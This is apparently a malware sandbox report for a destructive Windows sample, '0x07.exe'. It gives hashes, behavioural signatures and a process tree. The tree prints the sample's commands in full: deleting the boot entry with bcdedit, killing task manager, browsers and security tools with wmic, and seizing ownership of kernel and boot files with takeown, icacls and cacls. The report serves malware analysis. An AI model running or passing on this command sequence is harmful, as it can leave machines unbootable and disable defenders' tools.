Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/05/2023, 19:02

General

  • Target

    0x07.exe

  • Size

    247KB

  • MD5

    733eb0ab951ae42a8d8cca413201e428

  • SHA1

    640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1

  • SHA256

    52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb

  • SHA512

    c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f

  • SSDEEP

    3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 25 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Modifies file permissions 1 TTPs 25 IoCs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0x07.exe
    "C:\Users\Admin\AppData\Local\Temp\0x07.exe"
    1⤵
    • Checks computer location settings
    • Writes to the Master Boot Record (MBR)
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\Temp\winconfig.exe
      "C:\Windows\Temp\winconfig.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9129.tmp\9139.tmp\913A.bat C:\Windows\Temp\winconfig.exe"
        3⤵
        • Drops file in Drivers directory
        • Suspicious use of WriteProcessMemory
        PID:4304
        • C:\Users\Admin\AppData\Roaming\DetectKey.exe
          "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
          4⤵
          • Executes dropped EXE
          PID:2188
        • C:\Windows\system32\bcdedit.exe
          bcdedit /delete {current}
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4440
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='taskmgr.exe' delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4376
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='perfmon.exe' delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3900
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic process where name='mmc.exe' delete /nointeractive
          4⤵
            PID:2872
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where name='PartAssist.exe' delete /nointeractive
            4⤵
              PID:2244
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='control.exe' delete /nointeractive
              4⤵
                PID:2556
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic process where name='ProcessHacker.exe' delete /nointeractive
                4⤵
                  PID:4760
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic process where name='Security Task Manager.exe' delete /nointeractive
                  4⤵
                    PID:3960
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
                    4⤵
                      PID:3824
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where name='CCleaner.exe' delete /nointeractive
                      4⤵
                        PID:3832
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic process where name='procexp.exe' delete /nointeractive
                        4⤵
                          PID:4780
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic process where name='procexp64.exe' delete /nointeractive
                          4⤵
                            PID:3860
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic process where name='procexp64a.exe' delete /nointeractive
                            4⤵
                              PID:4280
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic process where name='logonui.exe' delete /nointeractive
                              4⤵
                                PID:2112
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic process where name='regedit.exe' delete /nointeractive
                                4⤵
                                  PID:1484
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic process where name='iexplore.exe' delete /nointeractive
                                  4⤵
                                    PID:4904
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic process where name='chrome.exe' delete /nointeractive
                                    4⤵
                                      PID:3852
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic process where name='firefox.exe' delete /nointeractive
                                      4⤵
                                        PID:436
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic process where name='opera.exe' delete /nointeractive
                                        4⤵
                                          PID:4640
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic process where name='edge.exe' delete /nointeractive
                                          4⤵
                                            PID:3200
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic process where name='msedge.exe' delete /nointeractive
                                            4⤵
                                              PID:3932
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic process where name='brave.exe' delete /nointeractive
                                              4⤵
                                                PID:2552
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic process where name='wmplayer.exe' delete /nointeractive
                                                4⤵
                                                  PID:4680
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic process where name='notepad.exe' delete /nointeractive
                                                  4⤵
                                                    PID:2580
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic process where name='notepad++.exe' delete /nointeractive
                                                    4⤵
                                                      PID:2192
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic process where name='taskmgr.exe' delete /nointeractive
                                                      4⤵
                                                        PID:396
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic process where name='perfmon.exe' delete /nointeractive
                                                        4⤵
                                                          PID:4152
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic process where name='logonui.exe' delete /nointeractive
                                                          4⤵
                                                            PID:4732
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                            4⤵
                                                              PID:3696
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\taskmgr.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:2208
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\hal.dll"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1748
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\winload.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:4284
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\ntoskrnl.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:3600
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\perfmon.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:828
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\resmon.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:4768
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\logonui.exe
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1268
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\taskkill.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1528
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\tasklist.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:400
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\tskill.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:2380
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\system32\logonui.exe"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:4832
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Program Files\Process Hacker 2"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:4936
                                                            • C:\Windows\system32\takeown.exe
                                                              takeown /f "C:\Windows\System32\drivers"
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:3060
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic process where name='taskmgr.exe' delete /nointeractive
                                                              4⤵
                                                                PID:4256
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic process where name='perfmon.exe' delete /nointeractive
                                                                4⤵
                                                                  PID:4456
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic process where name='logonui.exe' delete /nointeractive
                                                                  4⤵
                                                                    PID:4984
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                                    4⤵
                                                                      PID:4220
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1360
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:960
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:4956
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:4292
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:2020
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:3680
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:3296
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:4576
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:3204
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:2972
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:1256
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:3684
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic process where name='taskmgr.exe' delete /nointeractive
                                                                      4⤵
                                                                        PID:4052
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic process where name='perfmon.exe' delete /nointeractive
                                                                        4⤵
                                                                          PID:2116
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic process where name='logonui.exe' delete /nointeractive
                                                                          4⤵
                                                                            PID:1920
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic process where name='ProcessHacker.exe' delete /nointeractive
                                                                            4⤵
                                                                              PID:4580
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                              4⤵
                                                                                PID:2964
                                                                              • C:\Windows\system32\cacls.exe
                                                                                cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
                                                                                4⤵
                                                                                  PID:3180
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                  4⤵
                                                                                    PID:1324
                                                                                  • C:\Windows\system32\cacls.exe
                                                                                    cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
                                                                                    4⤵
                                                                                      PID:3764
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                      4⤵
                                                                                        PID:2184
                                                                                      • C:\Windows\system32\cacls.exe
                                                                                        cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
                                                                                        4⤵
                                                                                          PID:3776
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                          4⤵
                                                                                            PID:4660
                                                                                          • C:\Windows\system32\cacls.exe
                                                                                            cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
                                                                                            4⤵
                                                                                              PID:3632
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                              4⤵
                                                                                                PID:1488
                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
                                                                                                4⤵
                                                                                                  PID:4624
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                  4⤵
                                                                                                    PID:4640
                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                    cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
                                                                                                    4⤵
                                                                                                      PID:724
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                      4⤵
                                                                                                        PID:1532
                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                        cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
                                                                                                        4⤵
                                                                                                          PID:3200
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                          4⤵
                                                                                                            PID:2384
                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                            cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
                                                                                                            4⤵
                                                                                                              PID:1832
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                              4⤵
                                                                                                                PID:4724
                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
                                                                                                                4⤵
                                                                                                                  PID:4476
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                  4⤵
                                                                                                                    PID:636
                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                    cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
                                                                                                                    4⤵
                                                                                                                      PID:3144
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                      4⤵
                                                                                                                        PID:2260
                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                        cacls "C:\Windows\System32\drivers" /grant "everyone":F
                                                                                                                        4⤵
                                                                                                                          PID:3576

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9129.tmp\9139.tmp\913A.bat

                                                                                                                    Filesize

                                                                                                                    5KB

                                                                                                                    MD5

                                                                                                                    a645734f3bf4a2682cbaf546789ec0c4

                                                                                                                    SHA1

                                                                                                                    fafcc11909412bf51f217e12dfaa93a15181a3e2

                                                                                                                    SHA256

                                                                                                                    3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0

                                                                                                                    SHA512

                                                                                                                    efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

                                                                                                                  • C:\Users\Admin\AppData\Roaming\DetectKey.exe

                                                                                                                    Filesize

                                                                                                                    87KB

                                                                                                                    MD5

                                                                                                                    aba9a3cf4e1db4602c25405987b809a6

                                                                                                                    SHA1

                                                                                                                    6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

                                                                                                                    SHA256

                                                                                                                    490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

                                                                                                                    SHA512

                                                                                                                    e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

                                                                                                                  • C:\Users\Admin\AppData\Roaming\DetectKey.exe

                                                                                                                    Filesize

                                                                                                                    87KB

                                                                                                                    MD5

                                                                                                                    aba9a3cf4e1db4602c25405987b809a6

                                                                                                                    SHA1

                                                                                                                    6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

                                                                                                                    SHA256

                                                                                                                    490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

                                                                                                                    SHA512

                                                                                                                    e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

                                                                                                                  • C:\Windows\Temp\winconfig.exe

                                                                                                                    Filesize

                                                                                                                    139KB

                                                                                                                    MD5

                                                                                                                    11d457ee914f72a436fa4a8a8f8446dd

                                                                                                                    SHA1

                                                                                                                    d0308ca82ed9716b667e8e77e9ae013b9af44116

                                                                                                                    SHA256

                                                                                                                    c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

                                                                                                                    SHA512

                                                                                                                    4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

                                                                                                                  • C:\Windows\Temp\winconfig.exe

                                                                                                                    Filesize

                                                                                                                    139KB

                                                                                                                    MD5

                                                                                                                    11d457ee914f72a436fa4a8a8f8446dd

                                                                                                                    SHA1

                                                                                                                    d0308ca82ed9716b667e8e77e9ae013b9af44116

                                                                                                                    SHA256

                                                                                                                    c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

                                                                                                                    SHA512

                                                                                                                    4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

                                                                                                                  • C:\Windows\Temp\winconfig.exe

                                                                                                                    Filesize

                                                                                                                    139KB

                                                                                                                    MD5

                                                                                                                    11d457ee914f72a436fa4a8a8f8446dd

                                                                                                                    SHA1

                                                                                                                    d0308ca82ed9716b667e8e77e9ae013b9af44116

                                                                                                                    SHA256

                                                                                                                    c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

                                                                                                                    SHA512

                                                                                                                    4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b